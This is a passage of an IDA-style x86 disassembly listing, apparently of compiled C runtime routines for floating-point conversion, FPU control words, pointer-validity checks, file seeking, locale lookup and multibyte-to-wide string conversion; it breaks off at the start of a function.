sub_427B9F proc near ; CODE XREF: sub_427CC0+79�p
; sub_427CC0+C2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
dec edi
push 20h
lea eax, [edi+1]
pop ecx
cdq
idiv ecx
push 1Fh
pop esi
sub esi, edx
xor edx, edx
inc edx
mov ecx, esi
shl edx, cl
mov ebx, eax
mov eax, [ebp+arg_0]
test [eax+ebx*4], edx
jz short loc_427BEE
lea ecx, [edi+1]
push ecx
push eax
call sub_427B20
test eax, eax
pop ecx
pop ecx
jnz short loc_427BEB
push edi
push [ebp+arg_0]
call sub_427B52
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_427BEB: ; CODE XREF: sub_427B9F+3C�j
mov eax, [ebp+arg_0]
loc_427BEE: ; CODE XREF: sub_427B9F+2C�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax+ebx*4], edx
inc ebx
cmp ebx, ecx
jge short loc_427C09
lea edi, [eax+ebx*4]
sub ecx, ebx
xor eax, eax
rep stosd
loc_427C09: ; CODE XREF: sub_427B9F+5F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_427B9F endp
; =============== S U B R O U T I N E =======================================
sub_427C11 proc near ; CODE XREF: sub_427CC0+6D�p
; sub_427CC0+AC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push 3
pop edx
sub ecx, eax
push esi
loc_427C1F: ; CODE XREF: sub_427C11+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_427C1F
pop esi
retn
sub_427C11 endp
; =============== S U B R O U T I N E =======================================
sub_427C2C proc near ; CODE XREF: sub_427CC0+4D�p
arg_0 = dword ptr 4
xor eax, eax
loc_427C2E: ; CODE XREF: sub_427C2C+10�j
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_427C42
inc eax
cmp eax, 3
jl short loc_427C2E
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_427C42: ; CODE XREF: sub_427C2C+A�j
xor eax, eax
retn
sub_427C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427C45 proc near ; CODE XREF: sub_427CC0+B6�p
; sub_427CC0+D0�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
pop esi
cdq
mov ecx, esi
idiv ecx
mov ebx, [ebp+arg_0]
or edi, 0FFFFFFFFh
mov [ebp+arg_4], esi
mov ecx, edx
shl edi, cl
mov [ebp+var_8], eax
xor eax, eax
sub [ebp+arg_4], edx
not edi
mov [ebp+var_4], eax
loc_427C73: ; CODE XREF: sub_427C45+51�j
mov esi, [ebx+eax*4]
mov ecx, esi
and ecx, edi
mov [ebp+var_C], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+arg_4]
or esi, [ebp+var_4]
mov [ebx+eax*4], esi
mov esi, [ebp+var_C]
shl esi, cl
inc eax
cmp eax, 3
mov [ebp+var_4], esi
jl short loc_427C73
push 2
pop eax
mov ecx, eax
sub ecx, [ebp+var_8]
lea ecx, [ebx+ecx*4]
loc_427CA3: ; CODE XREF: sub_427C45+74�j
cmp eax, [ebp+var_8]
jl short loc_427CAF
mov edx, [ecx]
mov [ebx+eax*4], edx
jmp short loc_427CB3
; ---------------------------------------------------------------------------
loc_427CAF: ; CODE XREF: sub_427C45+61�j
and dword ptr [ebx+eax*4], 0
loc_427CB3: ; CODE XREF: sub_427C45+68�j
dec eax
sub ecx, 4
test eax, eax
jge short loc_427CA3
pop edi
pop esi
pop ebx
leave
retn
sub_427C45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427CC0 proc near ; CODE XREF: sub_427E18+D�p
; sub_427E2E+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_427D29
xor ebx, ebx
call sub_427C2C
test eax, eax
pop ecx
jnz loc_427DD8
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_427D21: ; CODE XREF: sub_427CC0+DA�j
push 2
pop eax
jmp loc_427DDA
; ---------------------------------------------------------------------------
loc_427D29: ; CODE XREF: sub_427CC0+49�j
lea eax, [ebp+var_18]
push eax
call sub_427C11
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_427B9F
add esp, 10h
test eax, eax
jz short loc_427D46
inc edi
loc_427D46: ; CODE XREF: sub_427CC0+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_427D5C
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_427D98
; ---------------------------------------------------------------------------
loc_427D5C: ; CODE XREF: sub_427CC0+90�j
cmp edi, eax
jg short loc_427D9C
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_427C11
lea eax, [ebp+var_C]
push edi
push eax
call sub_427C45
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_427B9F
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_427C45
add esp, 20h
loc_427D98: ; CODE XREF: sub_427CC0+9A�j
xor ebx, ebx
jmp short loc_427D21
; ---------------------------------------------------------------------------
loc_427D9C: ; CODE XREF: sub_427CC0+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_427DC4
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_427C45
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_427DDA
; ---------------------------------------------------------------------------
loc_427DC4: ; CODE XREF: sub_427CC0+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_427C45
pop ecx
pop ecx
loc_427DD8: ; CODE XREF: sub_427CC0+55�j
xor eax, eax
loc_427DDA: ; CODE XREF: sub_427CC0+64�j
; sub_427CC0+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_427E09
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_427E13
; ---------------------------------------------------------------------------
loc_427E09: ; CODE XREF: sub_427CC0+13A�j
cmp esi, 20h
jnz short loc_427E13
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_427E13: ; CODE XREF: sub_427CC0+147�j
; sub_427CC0+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_427CC0 endp
; =============== S U B R O U T I N E =======================================
sub_427E18 proc near ; CODE XREF: sub_427E44+2B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_443CD8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_427CC0
add esp, 0Ch
retn
sub_427E18 endp
; =============== S U B R O U T I N E =======================================
sub_427E2E proc near ; CODE XREF: sub_427E81+2B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_443CF0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_427CC0
add esp, 0Ch
retn
sub_427E2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E44 proc near ; CODE XREF: sub_4248B0+12�p
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_428B61
push [ebp+arg_0]
lea eax, [ebp+var_10]
push eax
call sub_427E18
mov ecx, [ebp+var_4]
add esp, 24h
call sub_422B83
leave
retn
sub_427E44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E81 proc near ; CODE XREF: sub_4248B0+2D�p
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_428B61
push [ebp+arg_0]
lea eax, [ebp+var_10]
push eax
call sub_427E2E
mov ecx, [ebp+var_4]
add esp, 24h
call sub_422B83
leave
retn
sub_427E81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427EBE proc near ; CODE XREF: sub_42490B+62�p
; sub_4249FC+5D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_427EFB
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_427EE1: ; CODE XREF: sub_427EBE+38�j
mov dl, [ecx]
test dl, dl
jz short loc_427EED
movsx edx, dl
inc ecx
jmp short loc_427EF0
; ---------------------------------------------------------------------------
loc_427EED: ; CODE XREF: sub_427EBE+27�j
push 30h
pop edx
loc_427EF0: ; CODE XREF: sub_427EBE+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_427EE1
mov edx, [ebp+arg_8]
loc_427EFB: ; CODE XREF: sub_427EBE+1C�j
test ebx, ebx
mov byte ptr [eax], 0
jl short loc_427F14
cmp byte ptr [ecx], 35h
jl short loc_427F14
jmp short loc_427F0C
; ---------------------------------------------------------------------------
loc_427F09: ; CODE XREF: sub_427EBE+52�j
mov byte ptr [eax], 30h
loc_427F0C: ; CODE XREF: sub_427EBE+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_427F09
inc byte ptr [eax]
loc_427F14: ; CODE XREF: sub_427EBE+42�j
; sub_427EBE+47�j
cmp byte ptr [esi], 31h
jnz short loc_427F1E
inc dword ptr [edx+4]
jmp short loc_427F30
; ---------------------------------------------------------------------------
loc_427F1E: ; CODE XREF: sub_427EBE+59�j
push edi
call sub_41E1C0
inc eax
push eax
push edi
push esi
call sub_41F980
add esp, 10h
loc_427F30: ; CODE XREF: sub_427EBE+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_427EBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427F35 proc near ; CODE XREF: sub_427FEF+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_427F85
cmp ebx, edi
jz short loc_427F7E
lea edi, [ecx+3C00h]
jmp short loc_427FA6
; ---------------------------------------------------------------------------
loc_427F7E: ; CODE XREF: sub_427F35+3F�j
mov edi, 7FFFh
jmp short loc_427FA6
; ---------------------------------------------------------------------------
loc_427F85: ; CODE XREF: sub_427F35+3B�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_427F9D
cmp edx, ebx
jnz short loc_427F9D
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_427FEA
; ---------------------------------------------------------------------------
loc_427F9D: ; CODE XREF: sub_427F35+54�j
; sub_427F35+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_427FA6: ; CODE XREF: sub_427F35+47�j
; sub_427F35+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_427FE1
loc_427FC2: ; CODE XREF: sub_427F35+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_427FC2
loc_427FE1: ; CODE XREF: sub_427F35+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_427FEA: ; CODE XREF: sub_427F35+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_427F35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427FEF proc near ; CODE XREF: sub_42490B+3E�p
; sub_4249FC+42�p ...
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
push esi
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_427F35
pop ecx
pop ecx
push offset word_4E2AE0
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_428FE8
mov ecx, [ebp+var_4]
mov ds:dword_4E2B04, eax
movsx eax, ds:byte_4E2AE2
mov ds:dword_4E2AFC, eax
movsx eax, ds:word_4E2AE0
mov ds:dword_4E2B00, eax
add esp, 18h
mov ds:dword_4E2B08, offset dword_4E2AE4
mov eax, offset dword_4E2AFC
call sub_422B83
pop edi
pop esi
leave
retn
sub_427FEF endp
; ---------------------------------------------------------------------------
db 6Ah
dd 8C7EE802h, 0C359FFFFh
; =============== S U B R O U T I N E =======================================
sub_42806C proc near ; CODE XREF: sub_42818C+C�p
xor eax, eax
test bl, 1
jz short loc_428076
push 10h
pop eax
loc_428076: ; CODE XREF: sub_42806C+5�j
test bl, 4
jz short loc_42807E
or eax, 8
loc_42807E: ; CODE XREF: sub_42806C+D�j
test bl, 8
jz short loc_428086
or eax, 4
loc_428086: ; CODE XREF: sub_42806C+15�j
test bl, 10h
jz short loc_42808E
or eax, 2
loc_42808E: ; CODE XREF: sub_42806C+1D�j
test bl, 20h
jz short loc_428096
or eax, 1
loc_428096: ; CODE XREF: sub_42806C+25�j
test bl, 2
jz short loc_4280A0
or eax, 80000h
loc_4280A0: ; CODE XREF: sub_42806C+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_4280DC
cmp ecx, 400h
jz short loc_4280D7
cmp ecx, 800h
jz short loc_4280D3
cmp ecx, esi
jnz short loc_4280DC
or eax, edi
jmp short loc_4280DC
; ---------------------------------------------------------------------------
loc_4280D3: ; CODE XREF: sub_42806C+5D�j
or eax, ebp
jmp short loc_4280DC
; ---------------------------------------------------------------------------
loc_4280D7: ; CODE XREF: sub_42806C+55�j
or eax, 100h
loc_4280DC: ; CODE XREF: sub_42806C+4D�j
; sub_42806C+61�j ...
and edx, edi
jz short loc_4280EB
cmp edx, ebp
jnz short loc_4280F0
or eax, 10000h
jmp short loc_4280F0
; ---------------------------------------------------------------------------
loc_4280EB: ; CODE XREF: sub_42806C+72�j
or eax, 20000h
loc_4280F0: ; CODE XREF: sub_42806C+76�j
; sub_42806C+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_4280FD
or eax, 40000h
locret_4280FD: ; CODE XREF: sub_42806C+8A�j
retn
sub_42806C endp
; =============== S U B R O U T I N E =======================================
sub_4280FE proc near ; CODE XREF: sub_42818C+22�p
xor eax, eax
test bl, 10h
jz short loc_428106
inc eax
loc_428106: ; CODE XREF: sub_4280FE+5�j
test bl, 8
jz short loc_42810E
or eax, 4
loc_42810E: ; CODE XREF: sub_4280FE+B�j
test bl, 4
jz short loc_428116
or eax, 8
loc_428116: ; CODE XREF: sub_4280FE+13�j
test bl, 2
jz short loc_42811E
or eax, 10h
loc_42811E: ; CODE XREF: sub_4280FE+1B�j
test bl, 1
jz short loc_428126
or eax, 20h
loc_428126: ; CODE XREF: sub_4280FE+23�j
test ebx, 80000h
jz short loc_428131
or eax, 2
loc_428131: ; CODE XREF: sub_4280FE+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_428165
cmp ecx, 100h
jz short loc_428160
cmp ecx, esi
jz short loc_428159
cmp ecx, edx
jnz short loc_428165
or eax, 0C00h
jmp short loc_428165
; ---------------------------------------------------------------------------
loc_428159: ; CODE XREF: sub_4280FE+4E�j
or eax, 800h
jmp short loc_428165
; ---------------------------------------------------------------------------
loc_428160: ; CODE XREF: sub_4280FE+4A�j
or eax, 400h
loc_428165: ; CODE XREF: sub_4280FE+42�j
; sub_4280FE+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_42817B
cmp ecx, 10000h
jnz short loc_42817D
or eax, esi
jmp short loc_42817D
; ---------------------------------------------------------------------------
loc_42817B: ; CODE XREF: sub_4280FE+6F�j
or eax, edx
loc_42817D: ; CODE XREF: sub_4280FE+77�j
; sub_4280FE+7B�j
test ebx, 40000h
pop esi
jz short locret_42818B
or eax, 1000h
locret_42818B: ; CODE XREF: sub_4280FE+86�j
retn
sub_4280FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42818C proc near ; CODE XREF: sub_4281BE+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_42806C
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_4280FE
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_42818C endp
; =============== S U B R O U T I N E =======================================
sub_4281BE proc near ; CODE XREF: sub_424BD4+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_42818C
pop ecx
pop ecx
retn
sub_4281BE endp
; =============== S U B R O U T I N E =======================================
sub_4281D4 proc near ; CODE XREF: sub_424F82+53�p
; sub_424F82+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_42B140 ; IsBadReadPtr
test eax, eax
jz short loc_4281EC
xor esi, esi
loc_4281EC: ; CODE XREF: sub_4281D4+14�j
mov eax, esi
pop esi
retn
sub_4281D4 endp
; =============== S U B R O U T I N E =======================================
sub_4281F0 proc near ; CODE XREF: sub_424F82+65�p
; sub_424F82+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_42B1BC ; IsBadWritePtr
test eax, eax
jz short loc_428208
xor esi, esi
loc_428208: ; CODE XREF: sub_4281F0+14�j
mov eax, esi
pop esi
retn
sub_4281F0 endp
; =============== S U B R O U T I N E =======================================
sub_42820C proc near ; CODE XREF: sub_424F82+128�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
call ds:dword_42B13C ; IsBadCodePtr
test eax, eax
jz short loc_428220
xor esi, esi
loc_428220: ; CODE XREF: sub_42820C+10�j
mov eax, esi
pop esi
retn
sub_42820C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254B5
loc_428224: ; CODE XREF: sub_4254B5:loc_4254DD�j
push 0Ah
call sub_426069
push 16h
call sub_4292AF
pop ecx
pop ecx
push 3
call sub_41F282
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_4254B5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42823C proc near ; CODE XREF: sub_425882+73�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4E2B98
push esi
push edi
jnb short loc_4282C0
mov ecx, eax
sar ecx, 5
mov esi, eax
and esi, 1Fh
lea edi, ds:4E2BA0h[ecx*4]
mov ecx, [edi]
shl esi, 3
test byte ptr [ecx+esi+4], 1
jz short loc_4282C0
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_8]
push eax
mov [ebp+var_4], ecx
call sub_42696C
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4282C7
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_42B0B8 ; SetFilePointer
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_4282AF
call ds:dword_42B01C ; RtlGetLastWin32Error
test eax, eax
jz short loc_4282AF
push eax
call sub_422C0F
pop ecx
jmp short loc_4282D1
; ---------------------------------------------------------------------------
loc_4282AF: ; CODE XREF: sub_42823C+5E�j
; sub_42823C+68�j
mov eax, [edi]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
jmp short loc_4282D7
; ---------------------------------------------------------------------------
loc_4282C0: ; CODE XREF: sub_42823C+10�j
; sub_42823C+2D�j
and ds:dword_4E28F8, 0
loc_4282C7: ; CODE XREF: sub_42823C+45�j
mov ds:dword_4E28F4, 9
loc_4282D1: ; CODE XREF: sub_42823C+71�j
or eax, 0FFFFFFFFh
or edx, 0FFFFFFFFh
loc_4282D7: ; CODE XREF: sub_42823C+82�j
pop edi
pop esi
leave
retn
sub_42823C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4282DB proc near ; CODE XREF: sub_425B55+27D�p
; sub_426DA0+15E�p ...
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_4437D4
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:dword_42B060 ; GetLocaleInfoA
test eax, eax
jnz short loc_42830A
or eax, 0FFFFFFFFh
jmp short loc_428314
; ---------------------------------------------------------------------------
loc_42830A: ; CODE XREF: sub_4282DB+28�j
lea eax, [ebp+var_C]
push eax
call sub_41E755
pop ecx
loc_428314: ; CODE XREF: sub_4282DB+2D�j
mov ecx, [ebp+var_4]
call sub_422B83
leave
retn
sub_4282DB endp
; =============== S U B R O U T I N E =======================================
sub_42831E proc near ; CODE XREF: sub_425B55+2A8�p
; sub_425B55+366�p ...
push 38h
push offset dword_43A2A8
call sub_425F14
mov eax, ds:dword_4437D4
mov [ebp-1Ch], eax
xor edi, edi
mov [ebp-34h], edi
mov [ebp-44h], edi
mov eax, [ebp+14h]
mov ebx, [eax]
mov [ebp-40h], ebx
mov [ebp-3Ch], edi
mov eax, [ebp+8]
cmp eax, [ebp+0Ch]
jz loc_4284C4
lea ecx, [ebp-30h]
push ecx
push eax
mov esi, ds:dword_42B190
call esi ; GetCPInfo
test eax, eax
jz short loc_428382
cmp dword ptr [ebp-30h], 1
jnz short loc_428382
lea eax, [ebp-30h]
push eax
push dword ptr [ebp+0Ch]
call esi ; GetCPInfo
test eax, eax
jz short loc_428382
cmp dword ptr [ebp-30h], 1
jnz short loc_428382
mov dword ptr [ebp-3Ch], 1
loc_428382: ; CODE XREF: sub_42831E+42�j
; sub_42831E+48�j ...
cmp [ebp-3Ch], edi
jz short loc_4283A1
cmp ebx, 0FFFFFFFFh
jz short loc_428390
mov esi, ebx
jmp short loc_42839C
; ---------------------------------------------------------------------------
loc_428390: ; CODE XREF: sub_42831E+6C�j
push dword ptr [ebp+10h]
call sub_41E1C0
pop ecx
mov esi, eax
inc esi
loc_42839C: ; CODE XREF: sub_42831E+70�j
mov [ebp-38h], esi
jmp short loc_4283A4
; ---------------------------------------------------------------------------
loc_4283A1: ; CODE XREF: sub_42831E+67�j
mov esi, [ebp-38h]
loc_4283A4: ; CODE XREF: sub_42831E+81�j
cmp [ebp-3Ch], edi
jnz short loc_4283C3
push edi
push edi
push ebx
push dword ptr [ebp+10h]
push 1
push dword ptr [ebp+8]
call ds:dword_42B07C ; MultiByteToWideChar
mov esi, eax
mov [ebp-38h], esi
cmp esi, edi
jz short loc_42841B
loc_4283C3: ; CODE XREF: sub_42831E+89�j
mov [ebp-4], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov ebx, esp
mov [ebp-48h], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_41E5F0
add esp, 0Ch
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_428407
; ---------------------------------------------------------------------------
dd 0C340C033h, 0E8E8658Bh, 0FFFFD676h, 0DB33FF33h, 0FFFC4D83h
db 8Bh, 75h, 0C8h
; ---------------------------------------------------------------------------
loc_428407: ; CODE XREF: sub_42831E+D0�j
cmp ebx, edi
jnz short loc_428429
push esi
push 2
call sub_4205E4
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_428422
loc_42841B: ; CODE XREF: sub_42831E+A3�j
xor eax, eax
jmp loc_4284D6
; ---------------------------------------------------------------------------
loc_428422: ; CODE XREF: sub_42831E+FB�j
mov dword ptr [ebp-44h], 1
loc_428429: ; CODE XREF: sub_42831E+EB�j
push esi
push ebx
push dword ptr [ebp-40h]
push dword ptr [ebp+10h]
push 1
push dword ptr [ebp+8]
call ds:dword_42B07C ; MultiByteToWideChar
test eax, eax
jz loc_4284C7
cmp [ebp+18h], edi
jz short loc_428469
push edi
push edi
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push esi
push ebx
push edi
push dword ptr [ebp+0Ch]
call ds:dword_42B090 ; WideCharToMultiByte
test eax, eax
jz short loc_4284C7
mov eax, [ebp+18h]
mov [ebp-34h], eax
jmp short loc_4284C7
; ---------------------------------------------------------------------------
loc_428469: ; CODE XREF: sub_42831E+129�j
cmp [ebp-3Ch], edi
jnz short loc_428484
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push dword ptr [ebp+0Ch]
call ds:dword_42B090 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_4284C7
loc_428484: ; CODE XREF: sub_42831E+14E�j
push esi
push 1
call sub_4205E4
pop ecx
pop ecx
mov [ebp-34h], eax
cmp eax, edi
jz short loc_4284C7
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push dword ptr [ebp+0Ch]
call ds:dword_42B090 ; WideCharToMultiByte
cmp eax, edi
jnz short loc_4284B7
push dword ptr [ebp-34h]
call sub_41E2A1
pop ecx
mov [ebp-34h], edi
jmp short loc_4284C7
; ---------------------------------------------------------------------------
loc_4284B7: ; CODE XREF: sub_42831E+189�j
cmp dword ptr [ebp-40h], 0FFFFFFFFh
jz short loc_4284C7
mov ecx, [ebp+14h]
mov [ecx], eax
jmp short loc_4284C7
; ---------------------------------------------------------------------------
loc_4284C4: ; CODE XREF: sub_42831E+2D�j
mov ebx, [ebp-48h]
loc_4284C7: ; CODE XREF: sub_42831E+120�j
; sub_42831E+141�j ...
cmp [ebp-44h], edi
jz short loc_4284D3
push ebx
call sub_41E2A1
pop ecx
loc_4284D3: ; CODE XREF: sub_42831E+1AC�j
mov eax, [ebp-34h]
loc_4284D6: ; CODE XREF: sub_42831E+FF�j
lea esp, [ebp-54h]
mov ecx, [ebp-1Ch]
call sub_422B83
call sub_425F4F
retn
sub_42831E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284E7 proc near ; CODE XREF: seg000:00425F9C�p
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
